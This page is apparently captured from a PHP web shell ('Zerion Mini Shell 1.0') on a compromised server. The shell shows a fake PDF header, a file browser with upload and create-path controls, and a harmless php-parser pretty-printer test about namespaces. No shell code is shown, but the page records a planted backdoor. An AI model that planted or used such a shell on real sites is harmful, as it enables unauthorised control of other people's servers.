%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/geotechnics/api/vendor/nikic/php-parser/test/code/prettyPrinter/stmt/
Upload File :
Create Path :
Current File : /var/www/html/geotechnics/api/vendor/nikic/php-parser/test/code/prettyPrinter/stmt/namespaces.test

Namespaces
-----
<?php

namespace Foo;

function foo()
{
}

namespace Bar;

function bar()
{
}
-----
namespace Foo;

function foo()
{
}
namespace Bar;

function bar()
{
}
-----
<?php

namespace Foo {
    function foo()
    {
    }
}

namespace {
    function glob() {
    }
}
-----
namespace Foo {
    function foo()
    {
    }
}
namespace {
    function glob()
    {
    }
}

Zerion Mini Shell 1.0